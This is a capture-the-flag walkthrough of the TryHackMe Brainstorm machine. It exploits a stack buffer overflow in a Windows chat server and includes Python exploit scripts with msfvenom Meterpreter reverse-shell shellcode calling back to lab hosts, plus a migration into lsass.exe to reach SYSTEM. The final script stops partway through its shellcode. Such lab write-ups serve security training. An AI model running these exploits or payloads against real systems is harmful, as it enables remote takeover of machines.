Brainstorm - tryhackme walkthrough
nmap scan
┌──(root㉿kali)-[~]
└─# nmap -T4 -p- -A -Pn 10.10.53.141
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-02-06 11:06 EST
Stats: 0:02:57 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 42.52% done; ETC: 11:13 (0:03:59 remaining)
Stats: 0:04:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.24% done; ETC: 11:13 (0:02:28 remaining)
Stats: 0:08:42 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 11:15 (0:01:00 remaining)
Stats: 0:09:56 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.76% done; ETC: 11:16 (0:00:00 remaining)
Nmap scan report for 10.10.46.59
Host is up (0.39s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|_ SYST: Windows_NT
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=brainstorm
| Not valid before: 2023-02-05T16:05:53
|_Not valid after: 2023-08-07T16:05:53
|_ssl-date: 2023-02-06T16:16:24+00:00; +1s from scanner time.
9999/tcp open abyss?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| Welcome to Brainstorm chat (beta)
| Please enter your username (max 20 characters): Write a message:
| NULL:| Welcome to Brainstorm chat (beta)
| Please enter your username (max 20 characters):
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 or 2008 Beta 3 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 262.72 ms 10.2.0.1
2 ... 3
4 390.45 ms 10.10.46.59
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 619.30 seconds
Open Ports:
21/tcp open ftp Microsoft ftpd
3389/tcp open ssl/ms-wbt-server?
9999/tcp open abyss?
ftp:
Anonymous login is allowed.
Anonymous Login
┌──(root㉿kali)-[~]
└─# ftp 10.10.53.141
Connected to 10.10.46.59.
220 Microsoft FTP Service
Name (10.10.46.59:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection.
08-29-19 07:36PM <DIR> chatserver
226 Transfer complete.
ftp> cd chatserver
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection.
08-29-19 09:26PM 43747 chatserver.exe
08-29-19 09:27PM 30761 essfunc.dll
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> mget *.*
mget chatserver.exe? y
200 PORT command successful.
150 Opening BINARY mode data connection.
226 Transfer complete.
43747 bytes received in 1.98 secs (21.5736 kB/s)
mget essfunc.dll? y
200 PORT command successful.
150 Opening BINARY mode data connection.
226 Transfer complete.
30761 bytes received in 1.58 secs (19.0279 kB/s)
ftp> bye
221 Goodbye.
How the exe works:
chatserver.exe listens on port 9999 for connections.
The exe and the .dll were copied to a separate Windows 7 machine with Immunity Debugger installed, so the crash can be analysed there.
┌──(root㉿kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# nc -nv 192.168.57.11 9999
(UNKNOWN) [192.168.57.11] 9999 (?) open
Welcome to Brainstorm chat (beta)
Please enter your username (max 20 characters): ffff
Write a message: ffffffffffffff
Tue Feb 07 13:09:09 2023
ffff said: ffffffffffffff
Write a message:
chatserver.exe takes two inputs: a username and a message.
Fuzzing:
┌──(root㉿kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# nc -nv 192.168.57.11 9999
(UNKNOWN) [192.168.57.11] 9999 (?) open
Welcome to Brainstorm chat (beta)
Please enter your username (max 20 characters): [long username input, elided]
Write a message: [long run of "A" characters, elided]
Although the username prompt says a maximum of 20 characters, a large username input did not cause a crash. A crash was observed, however, when a large input was sent as the message.
Generating pattern using metasploit scripts:
┌──(root㉿kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# msf-pattern_create -l 2000
┌──(root㉿kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# nc -nv 192.168.57.11 9999
(UNKNOWN) [192.168.57.11] 9999 (?) open
Welcome to Brainstorm chat (beta)
Please enter your username (max 20 characters): [2000-byte pattern, elided]
Write a message: [2000-byte pattern, elided]
Tue Feb 07 13:29:35 2023
Aa0Aa1Aa2Aa3Aa4Aa5Aa said: [2000-byte pattern, elided]
Write a message:
No crash observed with 2000 characters.
┌──(root㉿kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# msf-pattern_create -l 2400
The program crashed when an input of 2400 characters was sent.
Finding the EIP Offset
The value of the EIP when the program crashed is 31704330.
┌──(root㉿kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# msf-pattern_offset -q 31704330
[*] Exact match at offset 2012
The EIP Offset is 2012.
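An added example, not part of the original walkthrough and not Metasploit's code: it rebuilds the same upper/lower/digit cycle that msf-pattern_create emits and maps the EIP value recorded in the debugger (31704330) back to its offset, so the result above can be checked offline.

```python
"""Cyclic-pattern helpers in the style of msf-pattern_create / msf-pattern_offset.

Added example, not part of the original walkthrough and not Metasploit's code.
"""
import string

CYCLE_LEN = 26 * 26 * 10 * 3  # 20280 bytes before the plain pattern would repeat


def pattern_create(length: int) -> bytes:
    """Return the first `length` bytes of the 'Aa0Aa1Aa2...' cycle."""
    if length > CYCLE_LEN:
        raise ValueError("length exceeds the %d-byte unique cycle" % CYCLE_LEN)
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_hex: str, length: int = 2400) -> int:
    """Offset of the four pattern bytes that landed in EIP, or -1 if not found.

    The debugger shows EIP as a big-endian hex number (e.g. '31704330'), but
    x86 stores it little-endian, so the bytes are reversed ('0Cp1') before
    searching the pattern. This is what msf-pattern_offset -q does.
    """
    needle = int(eip_hex, 16).to_bytes(4, "little")
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    # Matches "[*] Exact match at offset 2012" from msf-pattern_offset above.
    print(pattern_offset("31704330"))
```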
Replacing the EIP
Script for replacing the EIP:
#!/usr/bin/env python3
# Sends a message that overwrites the saved return address at offset 2012
# with "BBBB" (0x42424242) to confirm that EIP is under our control.
import socket
import sys

total_length = 2400
offset = 2012
new_eip = b"BBBB"
username = b"vamsi"
# Padding up to the return address, the marker, then filler to the crash length.
message = b"A" * offset + new_eip + b"C" * (total_length - offset - len(new_eip))

try:
    print("Sending payload")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.57.11", 9999))
    s.recv(1024)  # banner
    s.recv(1024)  # username prompt
    s.send(username + b"\r\n")
    s.recv(1024)  # message prompt
    s.send(message + b"\r\n")
    s.recv(1024)
    s.close()
except OSError:
    print("Cannot connect to the machine")
    sys.exit(1)
EIP is overwritten with 42424242 (the four B bytes).
Finding bad characters:
Setting working folder for mona:
!mona config -set workingfolder C:\Immunitylogs\%p
Generating bytearray excluding default bad character (\x00):
!mona bytearray -b "\x00"
Script for crashing:
#!/usr/bin/env python3
# Same crash as before, but every byte value 0x01..0xff follows the EIP
# marker so the bytes at ESP can be compared against bytearray.bin in mona.
import socket
import struct
import sys

total_length = 2400
offset = 2012
new_eip = b"BBBB"
username = b"vamsi"
# 0x00 is left out: it is the default bad character mona already excludes.
all_characters = b"".join([struct.pack('<B', x) for x in range(1, 256)])
message = (b"A" * offset + new_eip + all_characters
           + b"C" * (total_length - offset - len(new_eip) - len(all_characters)))

try:
    print("Sending payload")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.57.11", 9999))
    s.recv(1024)  # banner
    s.recv(1024)  # username prompt
    s.send(username + b"\r\n")
    s.recv(1024)  # message prompt
    s.send(message + b"\r\n")
    s.recv(1024)
    s.close()
except OSError:
    print("Cannot connect to the machine")
    sys.exit(1)
ESP when the crash happens is 018BEEC0.
!mona compare -f "C:\Immunitylogs\chatserver\bytearray.bin" -a 018BEEC0
From the output of mona, there are no bad characters except for \x00.
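An added example, not part of the walkthrough and not mona's code: it reproduces the compare step in Python, reporting the first byte that was altered or that cut the copy short, and loops until the whole array survives, which is the manual cycle of regenerating the array with the new value excluded (the -b option above) and comparing again. The mangling_target function is a constructed stand-in for reading memory at ESP in the debugger; the real chatserver.exe showed no bad character other than \x00.

```python
"""Iterative bad-character check in the spirit of `!mona compare`.

Added example, not part of the walkthrough and not mona's code.
"""

KNOWN_BAD = frozenset({0x00})  # the default exclusion used above


def build_bytearray(exclude) -> bytes:
    """Every byte value except those already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def first_divergence(sent: bytes, dump: bytes):
    """Return (status, byte) for the first byte that did not survive.

    'ok'        : the whole array is present unchanged
    'changed'   : the byte was rewritten in place or dropped
    'truncated' : the copy stopped before this byte (dump is shorter)
    Only the first divergence is trustworthy: once a byte is dropped or
    replaced, everything after it may shift, so the caller removes that
    value and sends the array again.
    """
    for i, b in enumerate(sent):
        if i >= len(dump):
            return "truncated", b
        if dump[i] != b:
            return "changed", b
    return "ok", None


def find_bad_chars(read_back, known=KNOWN_BAD, max_rounds=16) -> set:
    """Repeat send/compare rounds until the array survives; return all bad bytes.

    read_back(payload) -> bytes stands in for sending the array and dumping
    memory at ESP in the debugger.
    """
    bad = set(known)
    for _ in range(max_rounds):
        sent = build_bytearray(bad)
        status, b = first_divergence(sent, read_back(sent))
        if status == "ok":
            return bad
        bad.add(b)
    raise RuntimeError("array still diverging after %d rounds" % max_rounds)


def mangling_target(payload: bytes) -> bytes:
    """Constructed target behaviour: the copy stops at LF and CR becomes a space."""
    cut = payload.find(b"\n")
    if cut != -1:
        payload = payload[:cut]
    return payload.replace(b"\r", b" ")


if __name__ == "__main__":
    found = find_bad_chars(mangling_target)
    print("bad characters:", ", ".join("\\x%02x" % b for b in sorted(found)))
```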
Finding the right module
┌──(root㉿kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP
00000000 FFE4 jmp esp
!mona find -s "\xff\xe4" -m essfunc.dll
We will use 0x6250151b to replace the EIP.
Generating the Shell code
The only bad character is \x00.
┌──(root㉿kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.57.4 LPORT=4444 -f py -b "\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of py file: 1865 bytes
buf = b""
buf += b"\xdb\xcf\xb8\xfe\x79\xc9\xa8\xd9\x74\x24\xf4\x5b\x31"
buf += b"\xc9\xb1\x59\x31\x43\x19\x03\x43\x19\x83\xeb\xfc\x1c"
buf += b"\x8c\x35\x40\x6f\x6f\xc6\x91\x0f\x41\x14\xf5\x44\xf3"
buf += b"\xa8\x7d\x08\xf8\x41\x64\x27\x52\x46\xec\x45\x7b\x69"
buf += b"\x45\xe3\x5d\x44\x56\xc2\x61\x0a\x94\x45\x1e\x51\xc9"
buf += b"\xa5\x1f\x9a\x1c\xa4\x58\x6c\x6a\x49\x34\x38\x1f\xc7"
buf += b"\xa9\x4d\x5d\xdb\xc8\x81\xe9\x63\xb3\xa4\x2e\x17\x0f"
buf += b"\xa6\x7e\x5c\xd7\x88\x7f\xb1\xb8\x43\x37\x2d\xbc\x9d"
buf += b"\xbc\x71\xf7\x2c\xc2\x02\x33\xc4\x3d\xc2\x0d\x1a\xfc"
buf += b"\x25\x60\x36\xfe\x7e\x43\xa6\x74\x74\xb7\x5b\x8f\x4f"
buf += b"\xc5\x87\x1a\x4f\x6d\x43\xbc\xab\x8f\x80\x5b\x38\x83"
buf += b"\x6d\x2f\x66\x80\x70\xfc\x1d\xbc\xf9\x03\xf1\x34\xb9"
buf += b"\x27\xd5\x1d\x19\x49\x4c\xf8\xcc\x76\x8e\xa4\xb1\xd2"
buf += b"\xc5\x47\xa7\x63\x26\x98\xc8\x39\xb0\x54\x05\xc2\x40"
buf += b"\xf3\x1e\xb1\x72\x5c\xb5\x5d\x3e\x15\x13\x99\x37\x31"
buf += b"\xa4\x75\xff\x52\x5a\x76\xff\x7b\x99\x22\xaf\x13\x08"
buf += b"\x4b\x24\xe4\xb5\x9e\xd0\xee\x21\xe1\x8c\xd6\xb5\x89"
buf += b"\xce\x28\xa7\x15\x47\xce\x97\xf5\x07\x5f\x58\xa6\xe7"
buf += b"\x0f\x30\xac\xe8\x70\x20\xcf\x23\x19\xcb\x20\x9d\x71"
buf += b"\x64\xd8\x84\x0a\x15\x25\x13\x77\x15\xad\x91\x87\xd8"
buf += b"\x46\xd0\x9b\x0d\x31\x1a\x64\xce\xd4\x1a\x0e\xca\x7e"
buf += b"\x4d\xa6\xd0\xa7\xb9\x69\x2a\x82\xba\x6e\xd4\x53\x8a"
buf += b"\x05\xe3\xc1\xb2\x71\x0c\x06\x32\x82\x5a\x4c\x32\xea"
buf += b"\x3a\x34\x61\x0f\x45\xe1\x16\x9c\xd0\x0a\x4e\x70\x72"
buf += b"\x63\x6c\xaf\xb4\x2c\x8f\x9a\xc6\x2b\x6f\x58\xe1\x93"
buf += b"\x07\xa2\xb1\x23\xd7\xc8\x31\x74\xbf\x07\x1d\x7b\x0f"
buf += b"\xe7\xb4\xd4\x07\x62\x59\x96\xb6\x73\x70\x76\x66\x73"
buf += b"\x77\xa3\x99\x0e\xf8\x54\x5a\xef\x10\x31\x5b\xef\x1c"
buf += b"\x47\x60\x39\x25\x3d\xa7\xf9\x12\x4e\x92\x5c\x32\xc5"
buf += b"\xdc\xf3\x44\xcc"
Script to run the exploit:
#!/usr/bin/env python3
import socket
import struct
import sys

total_length = 2400
offset = 2012
new_eip = struct.pack("<I", 0x6250151B)   # JMP ESP in essfunc.dll, little-endian
username = b"vamsi"

# msfvenom output (windows/meterpreter/reverse_tcp, LHOST=192.168.57.4, -b "\x00")
buf = b""
buf += b"\xdb\xcf\xb8\xfe\x79\xc9\xa8\xd9\x74\x24\xf4\x5b\x31"
buf += b"\xc9\xb1\x59\x31\x43\x19\x03\x43\x19\x83\xeb\xfc\x1c"
buf += b"\x8c\x35\x40\x6f\x6f\xc6\x91\x0f\x41\x14\xf5\x44\xf3"
buf += b"\xa8\x7d\x08\xf8\x41\x64\x27\x52\x46\xec\x45\x7b\x69"
buf += b"\x45\xe3\x5d\x44\x56\xc2\x61\x0a\x94\x45\x1e\x51\xc9"
buf += b"\xa5\x1f\x9a\x1c\xa4\x58\x6c\x6a\x49\x34\x38\x1f\xc7"
buf += b"\xa9\x4d\x5d\xdb\xc8\x81\xe9\x63\xb3\xa4\x2e\x17\x0f"
buf += b"\xa6\x7e\x5c\xd7\x88\x7f\xb1\xb8\x43\x37\x2d\xbc\x9d"
buf += b"\xbc\x71\xf7\x2c\xc2\x02\x33\xc4\x3d\xc2\x0d\x1a\xfc"
buf += b"\x25\x60\x36\xfe\x7e\x43\xa6\x74\x74\xb7\x5b\x8f\x4f"
buf += b"\xc5\x87\x1a\x4f\x6d\x43\xbc\xab\x8f\x80\x5b\x38\x83"
buf += b"\x6d\x2f\x66\x80\x70\xfc\x1d\xbc\xf9\x03\xf1\x34\xb9"
buf += b"\x27\xd5\x1d\x19\x49\x4c\xf8\xcc\x76\x8e\xa4\xb1\xd2"
buf += b"\xc5\x47\xa7\x63\x26\x98\xc8\x39\xb0\x54\x05\xc2\x40"
buf += b"\xf3\x1e\xb1\x72\x5c\xb5\x5d\x3e\x15\x13\x99\x37\x31"
buf += b"\xa4\x75\xff\x52\x5a\x76\xff\x7b\x99\x22\xaf\x13\x08"
buf += b"\x4b\x24\xe4\xb5\x9e\xd0\xee\x21\xe1\x8c\xd6\xb5\x89"
buf += b"\xce\x28\xa7\x15\x47\xce\x97\xf5\x07\x5f\x58\xa6\xe7"
buf += b"\x0f\x30\xac\xe8\x70\x20\xcf\x23\x19\xcb\x20\x9d\x71"
buf += b"\x64\xd8\x84\x0a\x15\x25\x13\x77\x15\xad\x91\x87\xd8"
buf += b"\x46\xd0\x9b\x0d\x31\x1a\x64\xce\xd4\x1a\x0e\xca\x7e"
buf += b"\x4d\xa6\xd0\xa7\xb9\x69\x2a\x82\xba\x6e\xd4\x53\x8a"
buf += b"\x05\xe3\xc1\xb2\x71\x0c\x06\x32\x82\x5a\x4c\x32\xea"
buf += b"\x3a\x34\x61\x0f\x45\xe1\x16\x9c\xd0\x0a\x4e\x70\x72"
buf += b"\x63\x6c\xaf\xb4\x2c\x8f\x9a\xc6\x2b\x6f\x58\xe1\x93"
buf += b"\x07\xa2\xb1\x23\xd7\xc8\x31\x74\xbf\x07\x1d\x7b\x0f"
buf += b"\xe7\xb4\xd4\x07\x62\x59\x96\xb6\x73\x70\x76\x66\x73"
buf += b"\x77\xa3\x99\x0e\xf8\x54\x5a\xef\x10\x31\x5b\xef\x1c"
buf += b"\x47\x60\x39\x25\x3d\xa7\xf9\x12\x4e\x92\x5c\x32\xc5"
buf += b"\xdc\xf3\x44\xcc"
shellcode = buf

nop_sled = b"\x90" * 32   # gives the shikata_ga_nai decoder room to unpack
# The original script subtracted len(all_characters) here, but that variable only exists
# in the bad-character script and caused a NameError; the padding is computed from the
# parts actually present in this message.
message = b"A" * offset + new_eip + nop_sled + shellcode + b"C" * (total_length - offset - len(new_eip) - len(nop_sled) - len(shellcode))

try:
    print("Sending payload")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.57.11", 9999))
    s.recv(1024)               # welcome banner
    s.recv(1024)               # username prompt
    s.send(username + b"\r\n")
    s.recv(1024)               # message prompt
    s.send(message + b"\r\n")
    s.recv(1024)
    s.close()
except:
    print("Cannot connect to the machine")
    sys.exit()
Setting up listener using msfconsole:
┌──(root??kali)-[~]
└─# msfconsole
[msfconsole ASCII-art banner]

https://metasploit.com

       =[ metasploit v6.0.45-dev                          ]
+ -- --=[ 2134 exploits - 1139 auxiliary - 364 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]
Metasploit tip: View a module's description using
info, or the enhanced version in your browser with
info -d
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set LHOST 192.168.57.4
LHOST => 192.168.57.4
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.57.4     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.57.4:4444
Execute the exploit.py script:
┌──(root??kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# python3 exploit.py
Sending payload
[*] Sending stage (175174 bytes) to 192.168.57.11
[*] Meterpreter session 1 opened (192.168.57.4:4444 -> 192.168.57.11:49296) at 2023-02-07 05:35:46 -0500
meterpreter > getuid
Server username: Win7x86\vhacker
meterpreter > sysinfo
Computer : WIN7X86
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x86
System Language : en_IN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > pgrep lsass.exe
516
meterpreter > migrate 516
[*] Migrating from 744 to 516...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN7X86
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x86
System Language : en_IN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
Final exploit against the original (TryHackMe) machine
Generating payload using msfvenom:
┌──(root??kali)-[~]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.57.4 netmask 255.255.255.0 broadcast 192.168.57.255
inet6 fe80::a00:27ff:fe0e:348d prefixlen 64 scopeid 0x20<link>
ether 08:00:27:0e:34:8d txqueuelen 1000 (Ethernet)
RX packets 93 bytes 29814 (29.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 115 bytes 21613 (21.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8 bytes 400 (400.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8 bytes 400 (400.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
**inet 10.2.23.54 netmask 255.255.128.0 destination 10.2.23.54**
inet6 fe80::6886:c011:2334:e275 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3 bytes 144 (144.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(root??kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.2.23.54 LPORT=4444 -f py -b "\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of py file: 1865 bytes
buf = b""
buf += b"\xd9\xf7\xbb\x38\xa8\x0e\x8c\xd9\x74\x24\xf4\x5d\x33"
buf += b"\xc9\xb1\x59\x31\x5d\x19\x03\x5d\x19\x83\xc5\x04\xda"
buf += b"\x5d\xf2\x64\x95\x9e\x0b\x75\xc9\xaf\xd9\xfc\xec\xb4"
buf += b"\x56\xac\xde\xbf\x3b\x5d\x95\x92\xaf\x52\x1e\x58\xf6"
buf += b"\xe7\x12\x75\xc7\x08\xe3\x45\x8b\xcb\x62\x3a\xd6\x1f"
buf += b"\x44\x03\x19\x52\x85\x44\xef\x18\x6a\x18\x7b\xb0\x64"
buf += b"\xca\xf0\x77\xb8\xf5\xd6\xf3\x80\x8d\x53\xc3\x74\x22"
buf += b"\x5d\x14\x24\x31\x05\xb4\xc5\x96\x3d\xfc\xdd\x9d\x8b"
buf += b"\x89\xe1\xac\xf4\x3b\x92\xfb\x81\xbd\x72\x32\x56\x11"
buf += b"\xbb\xfa\x5b\x6b\xfc\x3d\x84\x1e\xf6\x3d\x39\x19\xcd"
buf += b"\x3c\xe5\xac\xd1\xe7\x6e\x16\x35\x19\xa2\xc1\xbe\x15"
buf += b"\x0f\x85\x98\x39\x8e\x4a\x93\x46\x1b\x6d\x73\xcf\x5f"
buf += b"\x4a\x57\x8b\x04\xf3\xce\x71\xea\x0c\x10\xdd\x53\xa9"
buf += b"\x5b\xcc\x82\xcd\xa4\x0e\xab\x93\x32\xc2\x66\x2c\xc2"
buf += b"\x4c\xf0\x5f\xf0\xd3\xaa\xf7\xb8\x9c\x74\x0f\xc9\x8b"
buf += b"\x86\xdf\x71\xdb\x78\xe0\x81\xf5\xbe\xb4\xd1\x6d\x16"
buf += b"\xb5\xba\x6d\x97\x60\x56\x64\x0f\x81\xa4\x6f\xf9\xfd"
buf += b"\xaa\x8f\x14\xa2\x23\x69\x46\x0a\x63\x26\x27\xfa\xc3"
buf += b"\x96\xcf\x10\xcc\xc9\xf0\x1a\x07\x62\x9a\xf4\xf1\xda"
buf += b"\x33\x6c\x58\x90\xa2\x71\x77\xdc\xe5\xfa\x7d\x20\xab"
buf += b"\x0a\xf4\x32\xdc\x6c\xf6\xca\x1d\x19\xf6\xa0\x19\x8b"
buf += b"\xa1\x5c\x20\xea\x85\xc2\xdb\xd9\x96\x05\x23\x9c\xae"
buf += b"\x7e\x12\x0a\x8e\xe8\x5b\xda\x0e\xe9\x0d\xb0\x0e\x81"
buf += b"\xe9\xe0\x5d\xb4\xf5\x3c\xf2\x65\x60\xbf\xa2\xda\x23"
buf += b"\xd7\x48\x04\x03\x78\xb3\x63\x17\x7f\x4b\xf1\x30\xd8"
buf += b"\x23\x09\x01\xd8\xb3\x63\x81\x88\xdb\x78\xae\x27\x2b"
buf += b"\x80\x65\x60\x23\x0b\xe8\xc2\xd2\x0c\x21\x82\x4a\x0c"
buf += b"\xc6\x1f\x7d\x77\xa7\xa0\x7e\x88\xa1\xc4\x7f\x88\xcd"
buf += b"\xfa\xbc\x5e\xf4\x88\x83\x62\x43\x82\xb6\xc7\xe2\x09"
buf += b"\xb8\x54\xf4\x1b"
Final Exploit script:
#!/usr/bin/env python3
import socket
import struct
import sys

total_length = 2400
offset = 2012
new_eip = struct.pack("<I", 0x6250151B)   # JMP ESP in essfunc.dll, little-endian
username = b"vamsi"

# msfvenom output (windows/meterpreter/reverse_tcp, LHOST=10.2.23.54, -b "\x00")
buf = b""
buf += b"\xd9\xf7\xbb\x38\xa8\x0e\x8c\xd9\x74\x24\xf4\x5d\x33"
buf += b"\xc9\xb1\x59\x31\x5d\x19\x03\x5d\x19\x83\xc5\x04\xda"
buf += b"\x5d\xf2\x64\x95\x9e\x0b\x75\xc9\xaf\xd9\xfc\xec\xb4"
buf += b"\x56\xac\xde\xbf\x3b\x5d\x95\x92\xaf\x52\x1e\x58\xf6"
buf += b"\xe7\x12\x75\xc7\x08\xe3\x45\x8b\xcb\x62\x3a\xd6\x1f"
buf += b"\x44\x03\x19\x52\x85\x44\xef\x18\x6a\x18\x7b\xb0\x64"
buf += b"\xca\xf0\x77\xb8\xf5\xd6\xf3\x80\x8d\x53\xc3\x74\x22"
buf += b"\x5d\x14\x24\x31\x05\xb4\xc5\x96\x3d\xfc\xdd\x9d\x8b"
buf += b"\x89\xe1\xac\xf4\x3b\x92\xfb\x81\xbd\x72\x32\x56\x11"
buf += b"\xbb\xfa\x5b\x6b\xfc\x3d\x84\x1e\xf6\x3d\x39\x19\xcd"
buf += b"\x3c\xe5\xac\xd1\xe7\x6e\x16\x35\x19\xa2\xc1\xbe\x15"
buf += b"\x0f\x85\x98\x39\x8e\x4a\x93\x46\x1b\x6d\x73\xcf\x5f"
buf += b"\x4a\x57\x8b\x04\xf3\xce\x71\xea\x0c\x10\xdd\x53\xa9"
buf += b"\x5b\xcc\x82\xcd\xa4\x0e\xab\x93\x32\xc2\x66\x2c\xc2"
buf += b"\x4c\xf0\x5f\xf0\xd3\xaa\xf7\xb8\x9c\x74\x0f\xc9\x8b"
buf += b"\x86\xdf\x71\xdb\x78\xe0\x81\xf5\xbe\xb4\xd1\x6d\x16"
buf += b"\xb5\xba\x6d\x97\x60\x56\x64\x0f\x81\xa4\x6f\xf9\xfd"
buf += b"\xaa\x8f\x14\xa2\x23\x69\x46\x0a\x63\x26\x27\xfa\xc3"
buf += b"\x96\xcf\x10\xcc\xc9\xf0\x1a\x07\x62\x9a\xf4\xf1\xda"
buf += b"\x33\x6c\x58\x90\xa2\x71\x77\xdc\xe5\xfa\x7d\x20\xab"
buf += b"\x0a\xf4\x32\xdc\x6c\xf6\xca\x1d\x19\xf6\xa0\x19\x8b"
